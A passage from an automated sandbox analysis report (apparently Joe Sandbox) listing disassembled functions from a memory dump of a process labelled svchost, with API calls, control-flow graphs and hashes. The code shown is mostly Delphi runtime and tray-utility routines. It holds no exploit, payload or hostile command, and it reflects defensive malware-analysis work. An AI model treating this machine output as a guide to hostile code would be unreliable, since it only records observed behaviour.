                                                                                                                                                                      • Part of subcall function 03E345D8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 03E345F3
                                                                                                                                                                      • Part of subcall function 03E345D8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E34611
                                                                                                                                                                      • Part of subcall function 03E345D8: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E3462F
                                                                                                                                                                      • Part of subcall function 03E345D8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 03E3464D
                                                                                                                                                                      • Part of subcall function 03E345D8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,03E346DC,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03E34696
                                                                                                                                                                      • Part of subcall function 03E345D8: RegQueryValueExA.ADVAPI32(?,03E34858,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,03E346DC,?,80000001), ref: 03E346B4
                                                                                                                                                                      • Part of subcall function 03E345D8: RegCloseKey.ADVAPI32(?,03E346E3,00000000,00000000,00000005,00000000,03E346DC,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E346D6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2796650324-0
                                                                                                                                                                    • Opcode ID: 7da99163d140d08dce2798eac4622a11a75046096237bb5fc99d6a4447ad3200
                                                                                                                                                                    • Instruction ID: 3450363c493d8949796b4ef407379a7f4eeda095969460ade8ce891817312e4a
                                                                                                                                                                    • Opcode Fuzzy Hash: 7da99163d140d08dce2798eac4622a11a75046096237bb5fc99d6a4447ad3200
                                                                                                                                                                    • Instruction Fuzzy Hash: 80E06D71A003149BCB10EE6C88C8A8637E8AF0A654F441695ECA8DF28AD771DA208BD1
                                                                                                                                                                    Function 03E34C6C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 702 3e34c6c-3e34c73 703 3e34c75-3e34c81 call 3e34c44 702->703 704 3e34c8e 702->704 703->704 707 3e34c83-3e34c89 TlsFree 703->707 707->704
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 03E34C44: TlsGetValue.KERNEL32(00000019), ref: 03E34C5C
                                                                                                                                                                      • Part of subcall function 03E34C44: LocalFree.KERNEL32(00000000,00000019), ref: 03E34C66
                                                                                                                                                                    • TlsFree.KERNEL32(00000019), ref: 03E34C89
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Free$LocalValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2967491550-0
                                                                                                                                                                    • Opcode ID: 317b95b1e54e18857ba3a23599b080fd9b787d8c0319187105ee354fab0f6581
                                                                                                                                                                    • Instruction ID: 52184413215f6b7ed499a82286d8f7ad8a09be7b9185fe6498bcf640ee74b51d
                                                                                                                                                                    • Opcode Fuzzy Hash: 317b95b1e54e18857ba3a23599b080fd9b787d8c0319187105ee354fab0f6581
                                                                                                                                                                    • Instruction Fuzzy Hash: 10C04C2410036596FF24F6BB950C77571B86702225B69A3146460D71D4DA74C405CF26
                                                                                                                                                                    Function 03E315E8 Relevance: 1.3, APIs: 1, Instructions: 71memoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 708 3e315e8-3e31639 709 3e31696-3e3169d 708->709 710 3e3163b-3e31652 709->710 711 3e3169f-3e316a6 709->711 712 3e31654-3e31658 710->712 713 3e3165a-3e31661 710->713 712->713 714 3e31663-3e31667 713->714 715 3e3166a-3e3166f 713->715 714->715 716 3e31671-3e31688 VirtualAlloc 715->716 717 3e31690-3e31694 715->717 716->717 718 3e3168a-3e3168e 716->718 717->709 718->711
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 03E31681
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                    • Opcode ID: bf81a38576182df7ebedf42f44557afe8dfb248d6b9567118f4a5f62bd21eef2
                                                                                                                                                                    • Instruction ID: 15a242daeecabba9c9b6c4620c09e0ce261fcfed26f05f326f864b721a90a25a
                                                                                                                                                                    • Opcode Fuzzy Hash: bf81a38576182df7ebedf42f44557afe8dfb248d6b9567118f4a5f62bd21eef2
                                                                                                                                                                    • Instruction Fuzzy Hash: CA21CDB464424ADFC750DF6CC884A9AB7F4FF89354B188A69F998CB344D330E954CB52
                                                                                                                                                                    Function 03E31520 Relevance: 1.3, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 719 3e31520-3e3154c 720 3e315b9-3e315c0 719->720 721 3e315c2-3e315cb 720->721 722 3e3154e-3e3155f 720->722 723 3e315de-3e315e5 721->723 724 3e315cd-3e315db 721->724 725 3e315b3-3e315b7 722->725 726 3e31561-3e3156c 722->726 724->723 725->720 726->725 727 3e3156e-3e31572 726->727 728 3e31574 727->728 729 3e31578-3e31586 727->729 728->729 730 3e31588 729->730 731 3e3158c-3e315a0 VirtualFree 729->731 730->731 732 3e315a2 731->732 733 3e315ac-3e315ae call 3e312c4 731->733 732->733 733->725
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualFree.KERNEL32(0000000C,00000000,00008000), ref: 03E31599
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                    • Opcode ID: 9c42a345a70f0f3a1d6e030862cb05aa359eaaec3674c58177a49df2bd4ecf9d
                                                                                                                                                                    • Instruction ID: 205db704243e856ae12d9a062ae26ee13aa184b55acd6f76f601bf270d85accf
                                                                                                                                                                    • Opcode Fuzzy Hash: 9c42a345a70f0f3a1d6e030862cb05aa359eaaec3674c58177a49df2bd4ecf9d
                                                                                                                                                                    • Instruction Fuzzy Hash: CF21BF74604306AFC710EF19D888A4ABBE4FF89364F248A6DE59987350D331E850CB56
                                                                                                                                                                    Function 03E316A8 Relevance: 1.3, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 735 3e316a8-3e316f7 736 3e31751-3e31758 735->736 737 3e3175a-3e31761 736->737 738 3e316f9-3e3170f 736->738 739 3e31711-3e31715 738->739 740 3e31717-3e3171d 738->740 739->740 741 3e31725-3e31729 740->741 742 3e3171f-3e31723 740->742 743 3e3174b-3e3174f 741->743 744 3e3172b-3e3173f VirtualFree 741->744 742->741 743->736 744->743 745 3e31741 744->745 745->743
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualFree.KERNEL32(?,?,00004000), ref: 03E31738
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                    • Opcode ID: cddb50e74585b9630ee5e4e1119c29ccb3fce7b7018b50d9fa9e43f0702cbc30
                                                                                                                                                                    • Instruction ID: 0bf466703fd808e11e570db5f3c101d574df32e643fc97db47eebb45ffea732d
                                                                                                                                                                    • Opcode Fuzzy Hash: cddb50e74585b9630ee5e4e1119c29ccb3fce7b7018b50d9fa9e43f0702cbc30
                                                                                                                                                                    • Instruction Fuzzy Hash: E421E0B5204206DFC710DF2CD888A5AB7F4FF8A354B284A69E594CB344E331E905CB52

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 03E34400 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144stringlibraryfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 03E3441D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 03E3442E
                                                                                                                                                                    • lstrcpyn.KERNEL32(?,?,?,?,?,kernel32.dll), ref: 03E34462
                                                                                                                                                                    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 03E344D3
                                                                                                                                                                    • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll), ref: 03E3450E
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll), ref: 03E34521
                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 03E3452E
                                                                                                                                                                    • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 03E3453A
                                                                                                                                                                    • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 03E3456E
                                                                                                                                                                    • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 03E3457A
                                                                                                                                                                    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 03E345A3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                    • API String ID: 3245196872-1565342463
                                                                                                                                                                    • Opcode ID: 283d0415bf49b11def31226ded9fcefcc571b1ca7e5e9ba35591a626a8ef72da
                                                                                                                                                                    • Instruction ID: 79fb2d045b02c34a9733473fbc26895133d7b1ae652e99dd2bffa1bba0448f8c
                                                                                                                                                                    • Opcode Fuzzy Hash: 283d0415bf49b11def31226ded9fcefcc571b1ca7e5e9ba35591a626a8ef72da
                                                                                                                                                                    • Instruction Fuzzy Hash: 7A513A71D00259AFDF11EBE9CC88AEEB7F8AF46204F0516A5E155EB280D7749E40CF60
                                                                                                                                                                    Function 03E39304 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 27registryclipboardCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_WM_POSCHANGED), ref: 03E39315
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_WM_INIT_POS), ref: 03E39324
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_WM_ROLLUP), ref: 03E39333
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_WM_FREEMEMORY_NAME), ref: 03E39342
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_WM_STAYONTOP), ref: 03E39351
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_ProcessAttached), ref: 03E39360
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_ProcessDetached), ref: 03E3936F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ClipboardFormatRegister
                                                                                                                                                                    • String ID: 4tTray_ProcessAttached$4tTray_ProcessDetached$4tTray_WM_FREEMEMORY_NAME$4tTray_WM_INIT_POS$4tTray_WM_POSCHANGED$4tTray_WM_ROLLUP$4tTray_WM_STAYONTOP
                                                                                                                                                                    • API String ID: 1228543026-747308701
                                                                                                                                                                    • Opcode ID: 3d1210ef76ccf934e4cdaa0c724535f2d30dba7364cab90830ad57be92eb8d7c
                                                                                                                                                                    • Instruction ID: 96a4dfdd5ec575b13a92e2223505367f1777117eb1bf4c02878bcc88f158423e
                                                                                                                                                                    • Opcode Fuzzy Hash: 3d1210ef76ccf934e4cdaa0c724535f2d30dba7364cab90830ad57be92eb8d7c
                                                                                                                                                                    • Instruction Fuzzy Hash: 57F014B85403A89ED700FBB7784E6B936E4E7427117093359B5249B2A6D7B27800CF1A
                                                                                                                                                                    Function 03E37E9C Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,03E38167,?,?,00000000,00000000), ref: 03E37ED2
                                                                                                                                                                      • Part of subcall function 03E36A94: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 03E36AB2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                    • API String ID: 4232894706-2493093252
                                                                                                                                                                    • Opcode ID: ca6b8d826501f5ea37fc452f6691c0ed617a45f5ef7ebba2f51404b0e50aa300
                                                                                                                                                                    • Instruction ID: ba6000db4c7e16c4790a8672612dfc45fe4da85a2aff895d6063b791e824576b
                                                                                                                                                                    • Opcode Fuzzy Hash: ca6b8d826501f5ea37fc452f6691c0ed617a45f5ef7ebba2f51404b0e50aa300
                                                                                                                                                                    • Instruction Fuzzy Hash: E8611F3870034CABDB00FBB4DC89AAF77B6EB8A200F60B665E1119F345DA35D909D755
                                                                                                                                                                    Function 03E39C74 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 03E39CA7
                                                                                                                                                                    • GetProcAddress.KERNEL32(76680000,GetProcAddress), ref: 03E39CBC
                                                                                                                                                                    • LoadLibraryA.KERNEL32(user32.dll,?), ref: 03E39CD4
                                                                                                                                                                    • GetProcAddress.KERNEL32(767A0000,00000000), ref: 03E39CF6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                    • String ID: GetProcAddress$kernel32.dll$user32.dll
                                                                                                                                                                    • API String ID: 2574300362-2524697592
                                                                                                                                                                    • Opcode ID: 1bf01c41d6a34c2e677c412de072975c7c30f8784e83284e957407d5c570d9f2
                                                                                                                                                                    • Instruction ID: da4c9419a5ae2107a451a669a20ea18d98bcf1a671636ba59f743b4483bbd4c7
                                                                                                                                                                    • Opcode Fuzzy Hash: 1bf01c41d6a34c2e677c412de072975c7c30f8784e83284e957407d5c570d9f2
                                                                                                                                                                    • Instruction Fuzzy Hash: 47113C7490125CDFDB11FBA6D58D79CBBF4AB06704F9423D4E840A7245D3B4A941CF42
                                                                                                                                                                    Function 03E33B44 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,03E3B330,00000000,?,03E33C0E,?,?,?,03E3D630,?,?,03E3C0A8,03E34D21,03E3B330), ref: 03E33B7D
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,03E3B330,00000000,?,03E33C0E,?,?,?,03E3D630,?,?,03E3C0A8,03E34D21), ref: 03E33B83
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,03E33BCC,00000002,03E3B330,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,03E3B330,00000000,?,03E33C0E,?,?,?), ref: 03E33B98
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,03E33BCC,00000002,03E3B330,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,03E3B330,00000000,?,03E33C0E), ref: 03E33B9E
                                                                                                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 03E33BBC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileHandleWrite$Message
                                                                                                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                                                                                                    • API String ID: 1570097196-2970929446
                                                                                                                                                                    • Opcode ID: 93593ecdef28ebde143931e9d8d9b751654bc97355a496fc6b97ecdb289dd6d7
                                                                                                                                                                    • Instruction ID: 9bca6b6c119a3b56df426a33920d23ece6d2af7782d8e3ad63d3f085f783bf2d
                                                                                                                                                                    • Opcode Fuzzy Hash: 93593ecdef28ebde143931e9d8d9b751654bc97355a496fc6b97ecdb289dd6d7
                                                                                                                                                                    • Instruction Fuzzy Hash: B3F09664A8839879E630F2655E0EFDA267C5747F14F246309B2247C0CAC7B4C484CA65
                                                                                                                                                                    Function 03E3A600 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 245windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CallNextHookEx.USER32(?,?,?,?), ref: 03E3A63D
                                                                                                                                                                    • CallNextHookEx.USER32(00000000,?,?,?), ref: 03E3A655
                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 03E3A6B8
                                                                                                                                                                    • PostMessageA.USER32(?,0000001F,00000000,00000000), ref: 03E3A882
                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,?,000000F0,00000000,03E3A8FF,?,00000000,?,?,?,00000000,03E3A938), ref: 03E3A8AE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CallHookNext$LongMenuMessagePostSystemWindow
                                                                                                                                                                    • String ID: CabinetWClass
                                                                                                                                                                    • API String ID: 776588294-1981833947
                                                                                                                                                                    • Opcode ID: fdf74c5af3a33b01fd1b0657ed6913ecf56e064f815006f765946aa354b82c00
                                                                                                                                                                    • Instruction ID: 3c25c4954bbc90a7ffa1de2d6ebd178998cbca19f7419208a38add636fbaacf0
                                                                                                                                                                    • Opcode Fuzzy Hash: fdf74c5af3a33b01fd1b0657ed6913ecf56e064f815006f765946aa354b82c00
                                                                                                                                                                    • Instruction Fuzzy Hash: CFA1B039A00309EFDB14DF58D889EA9B7F5EF0A314F1596A0E985AB761C730E981CB10
                                                                                                                                                                    Function 03E3A36C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000000FF,000000FF), ref: 03E3A38F
                                                                                                                                                                    • SetProcessWorkingSetSize.KERNEL32(00000000,000000FF,000000FF), ref: 03E3A395
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CurrentSizeWorking
                                                                                                                                                                    • String ID: WM_CLOAK$WM_UNCLOAK
                                                                                                                                                                    • API String ID: 2122760700-2187480440
                                                                                                                                                                    • Opcode ID: bacacd42f4fa91638426a15ad7b1be1379faebde21a8cd24b59e55e43a5ec49e
                                                                                                                                                                    • Instruction ID: df02de288312bcef67ff7f9362bd9a113ec0bd6e7d4838c2643eb3b62c702b36
                                                                                                                                                                    • Opcode Fuzzy Hash: bacacd42f4fa91638426a15ad7b1be1379faebde21a8cd24b59e55e43a5ec49e
                                                                                                                                                                    • Instruction Fuzzy Hash: 4421CC38604248DFCB10EB59D48DD5CB7F1AF0A314F65A7A1E852AB3A1D731ED81DB11
                                                                                                                                                                    Function 03E37198 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 03E37000: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03E3701C
                                                                                                                                                                      • Part of subcall function 03E37000: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 03E37040
                                                                                                                                                                      • Part of subcall function 03E37000: GetModuleFileNameA.KERNEL32(03E30000,?,00000105), ref: 03E3705B
                                                                                                                                                                      • Part of subcall function 03E37000: LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 03E370FF
                                                                                                                                                                    • CharToOemA.USER32(?,?), ref: 03E371CF
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 03E371EC
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 03E371F2
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,03E3725C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 03E37207
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,03E3725C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 03E3720D
